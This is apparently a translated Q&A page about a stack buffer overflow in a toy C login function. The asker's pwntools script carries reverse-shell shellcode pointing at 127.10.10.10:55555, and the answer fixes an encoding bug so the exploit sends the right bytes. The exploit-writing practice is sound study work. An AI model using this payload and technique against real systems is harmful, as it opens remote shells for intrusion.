[缓冲区溢出:使用pwntools发送漏洞利用更改字节数

问题描述 投票:0回答:1

我正在尝试利用以下功能:

int auth(char *username, char *password) {
    char userpass[16];
    char *response;
    if (debugmode == 1) {
        printf("Debug: userpass buffer @ %p\n", userpass);
        fflush(stdout);
    }
    if (strcmp(username, "admin") != 0) return 0; printf("***** password %p\n", password); fflush(stdout);
    strcpy(userpass, password);
    if (strcmp(userpass, "1974jailbreak!") == 0) {
        return 1;
    } else {
        printf("Incorrect username and/or password.\n");
        return 0;
    }
    return 0;
}

缓冲区溢出在strcpy()

我正在用-m32 -z execstack -fno-stack-protector进行编译,并将/proc/sys/kernel/randomize_va_space设置为0

堆栈看起来像:28个字节到EIP,EIP,shellcode。

我正在使用pwntools来利用它:

from pwn import *
junk = ('AAA%AAsAABAA$AAnAACAA-AA(AAD') 
leaked = p32(0xffffcca0+28+4)
buf = "\x68" # from http://shell-storm.org/shellcode/files/shellcode-833.php
buf += "\xff\x0a\x0a\x0a"  # <- IP Number "127.10.10.10"
buf += "\x5e\x66\x68"
buf += "\xd9\x03"          # <- Port Number "55555"
buf += "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
buf += "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
buf += "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
buf += "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
buf += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
buf += "\xeb\xce"

p.sendline("PASS ".encode() + junk.encode() + leaked + buf.encode())

这是pwntools发送的内容:

bytes sent by pwntools

Shellcode明显不同,我的利用没有用。如何发送正确的字节?

c linux buffer-overflow
1个回答
0
投票

在此行

p.sendline("PASS ".encode() + junk.encode() + leaked + buf.encode())

您将缓冲区编码为UTF-8。这不是您想要的,您想按原样发送它们。

即latin-1中的"\xff"编码为UTF-8中的"\xc3\xbf"

删除.encode()调用,然后应发送正确的字节。

© www.soinside.com 2019 - 2024. All rights reserved.